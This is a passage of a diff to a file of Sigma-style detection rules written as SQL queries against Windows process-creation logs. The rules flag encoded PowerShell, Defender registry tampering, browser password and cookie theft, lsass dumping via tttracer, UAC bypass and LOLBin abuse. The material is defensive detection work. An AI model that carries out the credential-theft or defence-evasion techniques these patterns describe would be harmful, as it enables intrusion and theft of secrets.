CommandLine LIKE 
'%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "description": "Detects the 
use of a Microsoft signed script executing a managed DLL with PowerShell.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", - "author": "frack113", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Discovery of a System Time", - "id": "b243b280-65fe-48df-ba07-6ddea7646427", - "status": "test", - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_time_discovery.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Renamed SysInternals DebugView 
Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "status": "test", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be 
carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 
'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') 
AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_lolbin_tracker.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR 
(CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 
'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "status": "experimental", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT 
* FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR 
NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' 